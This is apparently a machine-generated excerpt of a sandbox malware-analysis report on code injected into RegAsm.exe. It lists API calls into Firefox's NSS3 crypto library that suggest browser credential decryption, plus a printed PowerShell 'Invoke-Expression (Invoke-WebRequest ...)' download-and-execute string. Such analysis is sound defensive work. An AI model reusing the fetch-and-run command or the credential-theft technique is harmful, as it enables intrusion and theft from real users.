                                                                                                                                                                                                                                                                  • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C976F7B
                                                                                                                                                                                                                                                                  • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C977011
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C977033
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C97703F
                                                                                                                                                                                                                                                                  • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C977060
                                                                                                                                                                                                                                                                  • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C977087
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C9770AF
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2108637330-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C98ADB1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96BE30: SECOID_FindOID_Util.NSS3(6C92311B,00000000,?,6C92311B,?), ref: 6C96BE44
                                                                                                                                                                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C98ADF4
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C98AE08
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C98AE25
                                                                                                                                                                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C98AE63
                                                                                                                                                                                                                                                                  • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C98AE4D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C894C70: PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C98AE93
                                                                                                                                                                                                                                                                  • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C98AECC
                                                                                                                                                                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C98AEDE
                                                                                                                                                                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C98AEE6
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C98AEF5
                                                                                                                                                                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C98AF16
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                                                                  • String ID: security
                                                                                                                                                                                                                                                                  • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                                                  • Opcode ID: 0df0479caa201b954a5b76e7585e2f82baf581e7f6b54a94a7471e1bf7493ec6
                                                                                                                                                                                                                                                                  • Instruction ID: 69f1933b8b78f4097cc7c7aeff5d84eabf67a92327f09d6f5b7afa19c1b1ac7e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0df0479caa201b954a5b76e7585e2f82baf581e7f6b54a94a7471e1bf7493ec6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4412CB1806210ABEB214A189C45BAB32B8AF6130CF540D25E85497FC2FF39D559C6F3
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C9A2A28,00000060,00000001), ref: 6C9A2BF0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C9A2A28,00000060,00000001), ref: 6C9A2C07
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C9A2A28,00000060,00000001), ref: 6C9A2C1E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A2BE0: free.MOZGLUE(?,00000000,00000000,?,6C9A2A28,00000060,00000001), ref: 6C9A2C4A
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5D0F
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5D4E
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5D62
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5D85
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5D99
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5DFA
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5E33
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C9A5E3E
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C9A5E47
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000,?,6C9A80C1), ref: 6C9A5E60
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C9AAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C9A5E78
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9A5EB9
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9A5EF0
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9A5F3D
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C9AAAD4), ref: 6C9A5F4B
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4273776295-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6c922a7b7ed08b6057422a501402a2e56e8c6a1f60b55c1f04f598ba433281d6
                                                                                                                                                                                                                                                                  • Instruction ID: 28641ceb852a39be1d772b5ffec7fe7c5da0e1650ca4d9affac937a887afb7cb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c922a7b7ed08b6057422a501402a2e56e8c6a1f60b55c1f04f598ba433281d6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC719FB5A00B019FD700DF64D884A93B7B9FFA9308F148529E85E87B11EB31F956CB91
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C89DD56
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C89DD7C
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C89DE67
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C89DEC4
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89DECD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 2339628231-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: f5d1d11f09ff4284649af5655348afb60b4c576f55e63183a63e7c828914fde8
                                                                                                                                                                                                                                                                  • Instruction ID: 78c443764db1f277ea637145b917fcedea317fc1ef14b9cee1c9db554979525b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5d1d11f09ff4284649af5655348afb60b4c576f55e63183a63e7c828914fde8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5A1E6716043159FC720CF2DCA81A6AB7F5AF85308F158D2EF8859BB51D730E845CBA5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_SignatureLen.NSS3(?), ref: 6C924D80
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C924D95
                                                                                                                                                                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C924DF2
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C924E2C
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C924E43
                                                                                                                                                                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C924E58
                                                                                                                                                                                                                                                                  • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C924E85
                                                                                                                                                                                                                                                                  • DER_Encode_Util.NSS3(?,?,6CA705A4,00000000), ref: 6C924EA7
                                                                                                                                                                                                                                                                  • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C924F17
                                                                                                                                                                                                                                                                  • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C924F45
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C924F62
                                                                                                                                                                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C924F7A
                                                                                                                                                                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C924F89
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C924FC8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2843999940-0
                                                                                                                                                                                                                                                                  • Opcode ID: 056df50ca82908a0007e022de2d42334970dc8bf9859d9fd5e8b08b8f9e6b308
                                                                                                                                                                                                                                                                  • Instruction ID: 88de61b92f677635ccabffd4b7e8712b6df609ae2f64e0ede347f8f586758043
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 056df50ca82908a0007e022de2d42334970dc8bf9859d9fd5e8b08b8f9e6b308
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0081C0B1918301AFE711CF24D840B9BB7E8AB94308F14852DF998DB644E735E914CF92
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C965C9B
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C965CF4
                                                                                                                                                                                                                                                                  • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C965CFD
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C965D42
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C965D4E
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C965D78
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C965E18
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C965E5E
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C965E72
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C965E8B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C95F854
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C95F868
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C95F882
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: free.MOZGLUE(04C483FF,?,?), ref: 6C95F889
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C95F8A4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C95F8AB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C95F8C9
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95F820: free.MOZGLUE(280F10EC,?,?), ref: 6C95F8D0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                                                                  • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                                                                  • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                                                                  • Opcode ID: ce94a8669baf369e037e0f5f3cc23d0dc244b57db012aa74f9569e99f5f3dc69
                                                                                                                                                                                                                                                                  • Instruction ID: e18458550ba6c33094de86d7009467f2841a9f3f77c0c0ca11faa88c14825583
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce94a8669baf369e037e0f5f3cc23d0dc244b57db012aa74f9569e99f5f3dc69
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D71D5B0A04201ABFF059F26DC4576A3279BF6531CF144135E80A9AFC3EB36E955C792
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C95781D,00000000,6C94BE2C,?,6C956B1D,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C40
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C95781D,?,6C94BE2C,?), ref: 6C956C58
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C6F
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C956C84
                                                                                                                                                                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C956C96
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: TlsGetValue.KERNEL32(00000040,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901267
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: EnterCriticalSection.KERNEL32(?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C90127C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901291
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: PR_Unlock.NSS3(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C9012A0
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C956CAA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                                  • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                                  • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                                  • Opcode ID: 971addf34ca16c23afbb2e3dafe98d33b9a143ff98c47f60492a7a145521759c
                                                                                                                                                                                                                                                                  • Instruction ID: 3fc62b613371a6087854da790368cad341e942cbc8c82cc938d7bbf47b12c667
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 971addf34ca16c23afbb2e3dafe98d33b9a143ff98c47f60492a7a145521759c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D801A7E17023522FEB00277AAE49F26356CAF8115DF948431FF04E0A42EAA6D57581B5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00412DC2
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00412DE3
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00412DF1
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00412E1D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00412E3B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00412E4F
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00412E62
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: _EH_prolog.MSVCRT ref: 0040C1DF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C232
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: memcmp.MSVCRT ref: 0040C270
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 00410F7E: GlobalAlloc.KERNEL32(00000000,00412EF0,00000000,00000000,?,00412EF0,?,?), ref: 00410F89
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000), ref: 00412EFC
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00412FCB
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062B5
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: LocalAlloc.KERNEL32(00000040,LY@,?,?,0040594C,00000000,?,?), ref: 004062C3
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062D9
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: LocalFree.KERNEL32(00000000,?,?,0040594C,00000000,?,?), ref: 004062E8
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: _EH_prolog.MSVCRT ref: 00406409
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memcmp.MSVCRT ref: 0040642F
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memset.MSVCRT ref: 0040645E
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406493
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00412F71
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426566,?,?,?,?,000003E8), ref: 00412F8E
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00412FA7
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004268E0), ref: 00412FB5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 174962345-0
                                                                                                                                                                                                                                                                  • Opcode ID: 373ced2fd5e81fd1b32ca1499eb274f2651f60a3878f506b19caf89aa058075e
                                                                                                                                                                                                                                                                  • Instruction ID: dd392c1b4b23fb95975a97ee58aadc884c7b7f48fd52fcc772572ec3cbda5285
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 373ced2fd5e81fd1b32ca1499eb274f2651f60a3878f506b19caf89aa058075e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D6120B2C00119AFCF10EBE0DC46EEEBBBDAF19304F14446AF505F3151E6399A998B65
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 786543732-0
                                                                                                                                                                                                                                                                  • Opcode ID: c74e68b15c75774cd0b1e0045603b920277c0de57049bd8fff9177d53b77cd8f
                                                                                                                                                                                                                                                                  • Instruction ID: 98819ec4f3477a383182b38f9d4a297b00db78380d134d2e9a9c754389587610
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c74e68b15c75774cd0b1e0045603b920277c0de57049bd8fff9177d53b77cd8f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5251D375F002269BDF01DF68CC416BE77B8BB16349F148129D908A7B00DB34E946CBE6
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00412816
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412BE5
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                                  • String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  • API String ID: 585178538-186952963
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_value_text16.NSS3(?), ref: 6C9E4CAF
